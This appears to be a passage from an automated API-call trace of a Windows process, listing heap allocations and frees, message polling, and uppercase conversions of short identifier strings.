0x2a719f8 [0212.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0212.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x575e) returned 0x3865018 [0212.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719f8 [0212.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0212.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0212.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0212.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a08 [0212.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0212.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0212.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0212.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a88 [0212.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0212.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0212.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0212.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6f0 [0212.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0212.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0212.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0212.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0212.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0212.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0212.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0212.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x575e) returned 0x2a900a0 [0212.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0212.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0212.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0212.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0212.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0212.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0212.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0212.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0212.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0212.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0212.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0212.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0212.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0212.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0212.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0212.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0212.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0212.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0212.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0212.030] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0212.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0212.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0212.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0212.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0212.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0212.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0212.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0212.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0212.031] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0212.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0212.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0212.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0212.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0212.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0212.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0212.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0212.031] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0212.031] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0212.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0212.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0212.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0212.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0212.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0212.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0212.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0212.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0212.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0212.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0212.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0212.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0212.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0212.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0212.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0212.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0212.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0212.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0212.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0212.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0212.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0212.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0212.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0212.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0212.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0212.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0212.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0212.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0212.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0212.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0212.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0212.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0212.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0212.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0212.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0212.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0212.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0212.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0212.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0212.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0212.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0212.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0212.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0212.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0212.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0212.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0212.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0212.033] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0212.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0212.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0212.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0212.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0212.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0212.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0212.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0212.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0212.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0212.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0212.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0212.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0212.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0212.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0212.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0212.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0212.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0212.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0212.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0212.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0212.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0212.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0212.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0212.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0212.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0212.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0212.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0212.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0212.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0212.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0212.034] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0212.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9a8 [0212.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0212.034] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0212.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0212.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0212.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0212.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0212.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0212.035] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0212.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0212.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0212.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0212.035] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0212.035] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0212.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0212.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0212.035] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0212.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0212.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae88 [0212.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854038 [0212.035] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0212.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0212.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0212.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0212.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0212.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0212.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0212.036] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0212.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0212.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0212.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0212.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0212.036] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0212.036] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0212.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0212.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0212.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0212.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0212.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0212.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0212.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0212.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0212.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854038 | out: hHeap=0x2af0000) returned 1 [0212.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0212.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0212.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0212.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0212.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0212.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.037] HeapFree 